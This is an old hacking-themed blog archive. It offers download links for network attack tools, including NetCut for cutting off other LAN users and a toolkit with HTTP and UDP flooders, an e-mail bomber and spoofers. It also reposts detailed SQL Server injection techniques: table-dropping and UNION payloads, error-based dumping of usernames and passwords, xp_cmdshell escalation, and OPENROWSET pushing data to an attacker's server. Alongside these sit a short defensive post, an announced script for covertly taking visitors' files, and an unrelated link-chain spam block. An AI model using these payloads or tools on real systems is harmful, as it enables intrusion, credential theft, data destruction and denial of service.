Labels

Sunday, December 26, 2010

wireshark

Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.
Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Features

Wireshark has a rich feature set which includes the following:
  • Deep inspection of hundreds of protocols, with more being added all the time
  • Live capture and offline analysis
  • Standard three-pane packet browser
  • Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
  • Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
  • The most powerful display filters in the industry
  • Rich VoIP analysis
  • Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
  • Capture files compressed with gzip can be decompressed on the fly
  • Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
  • Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
  • Coloring rules can be applied to the packet list for quick, intuitive analysis
  • Output can be exported to XML, PostScript®, CSV, or plain text 

download :
1. user guides : http://www.mediafire.com/?r68z73w3j14553c
2. download sofware : http://www.mediafire.com/?a7fnjwo2mqv3qwn

Tuesday, December 21, 2010

Net Tools 5



Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.
Contents

Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:
1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

download :  http://www.mediafire.com/?aolilumh9gxvnsm

Sunday, December 19, 2010

NetCut 3

NetCut is a Software that helps you admin your network by purely on ARP protocol . List IP-MAC Table in secs, turn off & On network on any computer on your LAN including any device like router , switcher. Also, netcut can protected user from ARP SPOOF attack
High intimate :Pure ARP protocol kernel.enhenced cut off funcation, that no one can escape from your cut off unless he have netcut installed and with protected funcation enabled.

Easy to use: One click to Protect user Computer Function!!! No one in the network can cut you off with ARP spoof technology anymore .
Effective: one Click to Cut down any computer s network connection to the gateway.
IYFT:Get all IP addresses of the computers in your LAN(Local Area Network) in Secs
High applicability:Work in office LAN,school LAN,or even ISP LAN
Have Fun with play the online computer make them online or off line remotely
Safe: TRACE Free, No one will TRACE out what happen
and last More Stable,swich-hub or hub or cable lan any Lan use Ethernet

NetCut  3 is licensed as Freeware for the Windows operating system / platform. NetCut is provided as a free download for all software users (Freeware).

download : http://www.mediafire.com/?lco7og0plqgg3qv

Cain & Abel snifing software

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and  some not so common utilities related to network and system security.

download : http://www.mediafire.com/?9p91cz3hvg1o0vo

Monday, July 5, 2010

Web Application Security : Solutions

4 Solutions
 
4.1 Some Ideas

There are a number of ideas to fix this two security problems. The basic approach is to create a library of ASP functions which can be used without much hassle. The advantage of this is that it can be used very easily. But it’s not the best way, because you need to think of it every time you read some request. The one and only place where you forget to use this functions might be the door for an attacker. The other major disadvantage is that this requires a system for code sharing to ensure that every Web application uses current functions.
        Combined with the ASP functions it’s possible to create a checker tool that reads the source files on the server and tries to detect the parameters which aren’t checked. This could even be automated using command line options and/or a configuration file.
        Another idea that floated around in my head was to create an ISAPI filter, so that you don’t have to rewrite the applications. This would be a great advantage, but it has some disadvantaged. The most serious problem is the fact that in the ISAPI filter you can’t know whether to protect this query against SQL injection
or cross-site scripting. As we have seen, both need different filtering. It might be possible to solve this using some configuration files. I have decided not to dig into this for the moment, because it would be quite time consuming.
       As I find the idea of the checker tool very sexy I decided to implement the ASP
functions and a checker tool.

Web Application Security : SQL Injection and Attack Demonstration

2. SQL Injection
Now to the more dangerous part: SQL injection. This is a technique which allows
the attacker to execute malicious SQL statements. With the help of xp_cmdshell
it’s even possible to execute system commands if the database is accessed as ’sa’.
This bug exists whenever you use unvalidated data that has been submitted by
the client to perform a database query. Let’s take this SQL-Statement, where the
string “TERM” can be submitted by the visitor.

     SELECT NewsId, NewsTitle
    FROM T_News
    WHERE NewsTitle LIKE ’%TERM%’

         The client could craft the term to drop the table T News:
 
   SELECT NewsId, NewsTitle
   FROM T_News
   WHERE NewsTitle LIKE ’%’;
   DROP TABLE T_News --’

Yes, this is possible. Just submit ’; DROP TABLE T_News -- as the search term.
First the WHERE clause is closed with the single quote, and then we can start the
next statement with the semicolon. The two dashes at the end start a comment,
so the single quote which the developer has inserted after the user’s input doesn’t
produce a syntax error.
It’s also possible to select any other data and display it instead of the News which
the developer wanted to display on this page. You can use the UNION statement for
that. The only requirement is that both queries return the same number of columns
and the same data type in each column. If necessary use CONVERT to achieve that.
[1] shows a trick how you can find out how many rows are included in the query
using the HAVING clause. One example for a UNION crack:

    SELECT NewsId, NewsTitle
    FROM T_News
    WHERE NewsTitle LIKE ’%DOESNOTEXIST’
    UNION SELECT UserId, UserName
    FROM T_User --%’


 2.1 Protection: Approach I

Filter characters
Luckily this attack is much easier to protect against than cross-site scripting. Make
sure to remove or escape all single quotes in string parameters. Additionally enforce
that any numeric input is really numeric using the IsNumeric function call. The
ASP functions (see section 4.2) include some generic functions to prevent you from
SQL injection attacks if you use them every time. The numeric and date functions
check if the input data is valid and then explicitly convert them with CInt, CLng,
CDate, etc.

2.2 Protection: Approach II

ADODB Command
There is another approach which is very safe but more work to implement[12].
You can use ADODB prepared statements to automatically sanitize the data. See
appendix D for an example.
Please note, that in the example I have checked the numeric parameters. This
isn’t strictly required, but if you let it out you get some nasty error messages:
“Application uses a value of the wrong type for the current operation.”.

Monday, June 28, 2010

Web Application Security

1. Cross-Site Scripting

Cross-site scripting (XSS) is a threat where the attacker can inject code into a Web
application which gets executed at the visitor’s site. This is possible whenever the
input of the user gets displayed on the Web site again, for example in guest books.
This attack form can be used to exploit browser bugs like buffer overflows and
ActiveX flaws or to steal cookies

1.1 Protection: Approach I
      Filter HTML Characters
The simplest approach to disable cross-site scripting is the filtering of HTML characters.
         > =  &gt
         < =  &lt
         ”  =  &quot
        & =  &amp
If you put this sanitized code in an HTML environment it should keep you save
from cross-site scripting bugs. But imagine this code:

Wednesday, June 23, 2010

Crime files on the client computer using PHP script By Tomero

Before me clarify the content of this title, I beg to what is practiced here is not to be a negative thing for other people. If you want to practice it with evil intent, everything is not my responsibility.

Okay, back to topic. You certainly did not expect, if an when I know what the plan behind the data you save on your computer. I do not need to call the shaman and stay up all day to wait for the father shaman completed its action, he .. he .. he. Did you know? with the following PHP script, the files exist on the client computer can be retrieved easily and tucked into your server. Enough to deceive the victim to open a site that is already inserted this script, then it will automatically retrieve (upload) to the server path to your destination.Here's the script:


Friday, June 18, 2010

ELEVATING PRIVILEGES & UPLOADING FILES:

Often an administrator will follow security best-practices and configure the application to use a
non-privileged login. Having found a vulnerability with the non-privileged login, an attacker will
attempt to elevate privileges to gain full administrator privileges. An attacker could exploit known
and unknown vulnerabilities to do so. Given the number of recent vulnerabilities discovered in
SQL Server, if an attacker can execute arbitrary queries, it is relatively easy to elevate privileges.
Published advisories can be viewed at:
http://www.appsecinc.com/cgi-bin/show_policy_list.pl?app_type=1&category=3
http://www.appsecinc.com/resources/alerts/mssql/


Tuesday, June 15, 2010

RETRIEVING RESULTS FROM SQL INJECTION:

The functions OPENROWSET and OPENDATASOURCE are most commonly used to pull data
into SQL Server to be manipulated. They can however also be used to push data to a remote
SQL Server. OPENROWSET can be used to not only execute SELECT statements, but also to
execute UPDATE, INSERT, and DELETE statements on external data sources. Performing data
manipulation on remote data sources is less common and only works if the OLEDB provider
supports this functionality. The SQLOLEDB provider support all these statements.

Below is an example of pushing data to an external data source:

insert into
            OPENROWSET('SQLoledb',
            'server=servername;uid=sa;pwd=h8ck3r',
            'select * from table1')
 select * from table2


In the example above, all rows in table2 on the local SQL Server will be appended to table1 in the
remote data source. In order for the statement to execute properly the two tables must have the
same structure.
As we learned in the previous section, remote datasources can be redirected to any server of the
attacker’s choice. An attacker could change the statement above to connect to a remote
datasource such as a copy of Microsoft SQL Server running on the attacker’s machine.

Friday, June 11, 2010

DETECTION OF SQL INJECTION VULNERABILITIES

 Many developers and web administrators are complacent about SQL Injection vulnerabilities if the
attacker cannot see the SQL error messages and/or cannot return the queries result directly to
the browser. This topic was first addressed in a white paper written by Chris Ansley of
NGSSoftware (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf). This paper

will expand on possible ways this threat can be used.
When trying to exploit SQL Injection in an application, an attacker needs a method of determining
if the SQL injected is executed on the server. As well, a method of retrieving the results is
needed. Two built-in functions of SQL Server can be used for this purpose. The OPENROWSET
and OPENDATASOURCE functions allow a user in SQL Server to open remote data sources.
These functions are used to open a connection to an OLEDB provider. The OPENROWSET
function will be use in all the examples but the OPENDATASOURCE function could be used with
the same results.
This statement will return all the rows of table1 on the remote data source:

 select * from
      OPENROWSET( 'SQLoledb',
      'server=servername;uid=sa;pwd=h8ck3r',
      'select * from table1' )


Parameters:
(1) OLEDB Provider name
(2) Connection string (could be an OLEDB data source or an ODBC connection string)
(3) SQL statement

Tuesday, June 8, 2010

Advanced SQL Injection In SQL Server Applications part 4

[Advanced SQL Injection]
It is often the case that a web application will 'escape' the single quote character (and others), and otherwise 'massage' the data that is submitted by the user, such as by limiting its length.
In this section, we discuss some techniques that help attackers bypass some of the more obvious defences against SQL injection, and evade logging to a certain extent.
[Strings without quotes]
Occasionally, developers may have protected an application by (say) escaping all 'single quote' characters, perhaps by using the VBScript 'replace' function or similar:
function escape( input )
input = replace(input, "'", "''")
escape = input
end function
Admittedly, this will prevent all of the example attacks from working on our sample site, and removing ';' characters would also help a lot. However, in a larger application it is likely that several values that the user is supposed to input will be numeric. These values will not require 'delimiting', and so may provide a point at which the attacker can insert SQL.
If the attacker wishes to create a string value without using quotes, they can use the 'char' function. For example:
insert into users values( 666,
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
0xffff)
…is a query containing no quote characters, which will insert strings into a table.
Of course, if the attacker doesn't mind using a numeric username and password, the following statement would do just as well:
insert into users values( 667,
123,
123,
0xffff)
Since SQL Server automatically converts integers into 'varchar' values, the type conversion is implicit.
[Second-Order SQL Injection]
Even if an application always escapes single - quotes, an attacker can still inject SQL as long as data in the database is re-used by the application.
For example, an attacker might register with an application, creating a username
Username: admin'--
Password: password

Sunday, June 6, 2010

Advanced SQL Injection In SQL Server Applications part 3

[Leveraging Further Access]
Once an attacker has control of the database, they are likely to want to use that access to obtain further control over the network. This can be achieved in a number of ways:
1. Using the xp_cmdshell extended stored procedure to run commands as the SQL server user, on the database server
2. Using the xp_regread extended stored procedure to read registry keys, potentially including the SAM (if SQL Server is running as the local system account)
3. Use other extended stored procedures to influence the server
4. Run queries on linked servers
5. Creating custom extended stored procedures to run exploit code from within the SQL Server process
6. Use the 'bulk insert' statement to read any file on the server
7. Use bcp to create arbitrary text files on the server
8. Using the sp_OACreate, sp_OAMethod and sp_OAGetProperty system stored procedures to create Ole Automation (ActiveX) applications that can do everything an ASP script can do
These are just a few of the more common attack scenarios; it is quite possible that an attacker will be able to come up with others. We present these techniques as a collection of relatively obvious SQL Server attacks, in order to show just what is possible, given the ability to inject SQL. We will deal with each of the above points in turn.
[xp_cmdshell]

VIRAL LINKING

{Start Copy Here}


Rules :
  1. Copy Paste from {Start Copy Here} to {End Copy Here}
  2. Please Link Back to the person who tagged you and PASS this tag to many of your friends.
  3. If you have more the one Blog, please post this to all of your Blogs, the more the merrier
  4. The use of NO FOLLOW on links is not allowed, Let's all be fair!
  5. Remember to come back here at JENNY TALKS (pls don't change this link) and leave the exact post url so i can add you to the master list to help increase our rankings and improve our Technorati Authority
  6. Spread the Virus.. oooooops i mean the VIRAL LINKING and happy blogging

#1. Scraps & Shots #2. Simply Jen 3. This and That 4. Fab & Chic Finds 5.A Slice of Life 6. Jenny Talks 7.Tech Stuff Plus 8. Food on the Table 9. Aussie Talks 10. When Mom Talks 11. Moments of My Life 12. My Crossroads 13. A Life in Bloom 14. Because Life is a Blessing 15. Digiscraptology 16. BLOGSILOG 14.Cherry's Comfort Zone 15. DigiScrapz: Captured Memories 16. Buzzy Me 17. Fab Finds, Etc. 18. Thinking Out Loud 19. Wishing and Hoping 20. PRC Board Exam Results 21. Jobs Abroad 22. My Blog Portfolio17.Race Corner 18. Mommy Talks. 19. Home and Health 20. All Kinds of Me Stuff 21. Ink Baby Studios 22.The Salad Caper 23. Winding Creek Circle 24. Aggie Scraps 25. Momma Stuff 26. We Are Family 27.Gandacious 28. Busynessworld 29. Folcreative 30. Swanportraits 31. Rumination Under The Clouds 32.Consciously Think 33. Sprawt 34. Healthy Skinny 35. Geekyology 36. When Mom Speaks 37. Rumination38. Amiable Amy 39. Captured on Time 40. Pit of Gadgetry 41. Me and Mine 42. Little Peanut 43. Creative in Me 44. Around the world 45. Pea in a Pod 46. For the LOVE of Food 47. Music of My Heart 48. It’s Where the Heart Is 49. Blog in to Space 50. A Mothers Horizon 51. Simply me 52. Whats Up 53. Comedy Plus 54.Lovin' Life 55.Ozzy's Mom 56. Apple and Candie 57. I was once lost in love 58. Pinay in Love 59. Pau's Big Thoughts 60. Twisted Angel 61. Hailey's Beat and Bits 62. Living A' La Mode 63. Bits and Pieces 64. Honey and Daisy 65. Pinay Ads 66. Great Kingkay 66. It's Naptime 67. Lisgold 68. Signe Says 69. Thomas Web Links 70. Thomas Travel Tales 71. Nita's Corner 72. Great Finds and Deals 73. Nita's Ramblings 74.Batuananons 75. Filipino Online Community 76. Healthy Living and Lifestyle 77. CompTechGadgets 78.Nita's Random Thoughts 79. Make Money Online 80. Erlinda's Wandering Thoughts 81. Kitty's haven 82.This and That 83. Shoppaholic girly 84. My Life in this Wonderful World 85. My Online World 86. Joys in Life 87. Journey in Life 88. Tere's World 89. Jean's Live it Up 90. Muzikistah 91. Maharot 92. SUPASTAH!93.Life is a constant journey 94.Amazingly Me 70. Treeennndddzzz 96. otwarteInfo’s 98. AdventureSage 99. in-Tech Revolution 100. LovingMore 101. From Melissa's Desk 102. denz Recreational 103. Network of Combined Ideas 104. Sheltered Not Shattered 105. Mommying on the Fly 106. Me, Myself and Darly 107. Stay at Home Mom 108. Harmony in Motion 109. My Happy Thoughts 110. Mommyhood is Thankless 111. Life is Random. SO.I.AM 112.Life's sweet and spices 113. Rainbow Colored Me 114. My Oweini Life 115. All About Mye Life 116. Is it Bedtime Yet 117. Super Coupon Girl 118. My Life.... My Journey 119. Project Wicked Blogs and Reviews 120. Life According To Me 121. WilStop 122. I Love Pixels 123. Cellulitic Bliss 124.Underneath It All 125. Momstart 126. Pinaymama's Diary 127. My Heart 4 Him 128. 1StopMom 129.Random Chronicles 130. Maeyonnaise 131.Blessings in Life 132.Tebosupra web134.Blog Kamu
{End Copy Here}

Advanced SQL Injection In SQL Server Applications part 2

[Obtaining Information Using Error Messages]

This technique was first discovered by David Litchfield and the author in the course of a
penetration test; David later wrote a paper on the technique [1], and subsequent authors
have referenced this work. This explanation discusses the mechanisms underlying the
'error message' technique, enabling the reader to fully understand it, and potentially
originate variations of their own.

In order to manipulate the data in the database, the attacker will have to determine the
structure of certain databases and tables. For example, our 'users' table might have been
created with the following command:

create table users(  id int, 
   username varchar(255),
    password varchar(255),
    privs int
   )

..and had the following users inserted:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )

Let's say our attacker wants to insert a user account for himself. Without knowing the
structure of the 'users' table, he is unlikely to be successful. Even if he gets lucky, the
significance of the 'privs' field is unclear. The attacker might insert a '1', and give himself
a low - privileged account in the application, when what he was after was administrative
access.

Fortunately for the attacker, if error messages are returned from the application (the
default ASP behaviour) the attacker can determine the entire structure of the database,
and read any value that can be read by the account the ASP application is using to
connect to the SQL Server.

(The following examples use the supplied sample database and .asp scripts to illustrate
how these techniques work.)

First, the attacker wants to establish the names of the tables that the query operates on,
and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select'
statement:

Username: ' having 1=1--

This provokes the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause. 

/process_login.asp, line 35 

So the attacker now knows the table name and column name of the first column in the
query. They can continue through the columns by introducing each field into a 'group by'
clause, as follows:

Username: ' group by users.id having 1=1--

(which produces the error…)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause. 

/process_login.asp, line 35 

Eventually the attacker arrives at the following 'username':' group by users.id, users.username, users.password, users.privs having
1=1--

… which produces no error, and is functionally equivalent to:

select * from users where username = ''

So the attacker now knows that the query is referencing only the 'users' table, and is using
the columns 'id, username, password, privs', in that order.

It would be useful if he could determine the types of each column. This can be achieved
using a 'type conversion' error message, like this:

Username: ' union select sum(username) from users--

This takes advantage of the fact that SQL server attempts to apply the 'sum' clause before
determining whether the number of fields in the two rowsets is equal. Attempting to
calculate the 'sum' of a textual field results in this message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument. 

/process_login.asp, line 35 

..which tells us that the 'username' field has type 'varchar'. If, on the other hand, we
attempt to calculate the sum() of a numeric type, we get an error message telling us that
the number of fields in the two rowsets don't match:

Username: ' union select sum(id) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists. 

/process_login.asp, line 35 

We can use this technique to approximately determine the type of any column of any
table in the database.

This allows the attacker to create a well - formed 'insert' query, like this:

Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff
)--

However, the potential of the technique doesn't stop there. The attacker can take advantage of any error message that reveals information about the environment, or the
database. A list of the format strings for standard error messages can be obtained by
running:

select * from master..sysmessages

Examining this list reveals some interesting messages.

One especially useful message relates to type conversion. If you attempt to convert a
string into an integer, the full contents of the string are returned in the error message. In
our sample login page, for example, the following 'username' will return the specific
version of SQL server, and the server operating system it is running on:

Username: ' union select @@version,1,1,1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug
6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of
data type int. 

/process_login.asp, line 35 

This attempts to convert the built-in '@@version' constant into an integer because the
first column in the 'users' table is an integer.

This technique can be used to read any value in any table in the database. Since the
attacker is interested in usernames and passwords, they are likely to read the usernames
from the 'users' table, like this:

Username: ' union select min(username),1,1,1 from users where username >
'a'--

This selects the minimum username that is greater than 'a', and attempts to convert it to an
integer:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'admin' to a column of data type int. 

/process_login.asp, line 35 

So the attacker now knows that the 'admin' account exists. He can now iterate through the
rows in the table by substituting each new username he discovers into the 'where' clause:

Username: ' union select min(username),1,1,1 from users where username >
'admin'-- Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'chris' to a column of data type int. 

/process_login.asp, line 35 

Once the attacker has determined the usernames, he can start gathering passwords:

Username: ' union select password,1,1,1 from users where username =
'admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'r00tr0x!' to a column of data type int. 

/process_login.asp, line 35 

A more elegant technique is to concatenate all of the usernames and passwords into a
single string, and then attempt to convert it to an integer. This illustrates another point;
Transact-SQL statements can be string together on the same line without altering their
meaning. The following script will concatenate the values:

begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where
username>@ret
select @ret as ret into foo
end

The attacker 'logs in' with this 'username' (all on one line, obviously…)

Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--

This creates a table 'foo', which contains the single column 'ret', and puts our string into it.
Normally even a low-privileged user will be able to create a table in a sample database, or
the temporary database.

The attacker then selects the string from the table, as before:

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int./process_login.asp, line 35 

And then drops (deletes) the table, to tidy up:

Username: '; drop table foo--

These examples are barely scratching the surface of the flexibility of this technique.
Needless to say, if the attacker can obtain rich error information from the database, their
job is infinitely easier.

Friday, June 4, 2010

Advanced SQL Injection In SQL Server Applications part 1

[Abstract]
This document discusses in detail the common 'SQL injection' technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. It discusses the various ways in which SQL can be 'injected' into the application and addresses some of the data validation and database lockdown issues that are related to this class of attack.
The paper is intended to be read by both developers of web applications which communicate with databases and by security professionals whose role includes auditing these web applications.
[Introduction]
Structured Query Language ('SQL') is a textual language used to interact with relational databases. There are many varieties of SQL; most dialects that are in common use at the moment are loosely based around SQL-92, the most recent ANSI standard. The typical unit of execution of SQL is the 'query', which is a collection of statements that typically return a single 'result set'. SQL statements can modify the structure of databases (using Data Definition Language statements, or 'DDL') and manipulate the contents of databases (using Data Manipulation Language statements, or 'DML'). In this paper, we will be specifically discussing Transact-SQL, the dialect of SQL used by Microsoft SQL Server.
SQL Injection occurs when an attacker is able to insert a series of SQL statements into a 'query' by manipulating data input into an application.
A typical SQL statement looks like this:
select id, forename, surname from authors
This statement will retrieve the 'id', 'forename' and 'surname' columns from the 'authors' table, returning all rows in the table. The 'result set' could be restricted to a specific 'author' like this:
select id, forename, surname from authors where forename = 'john' and surname = 'smith'
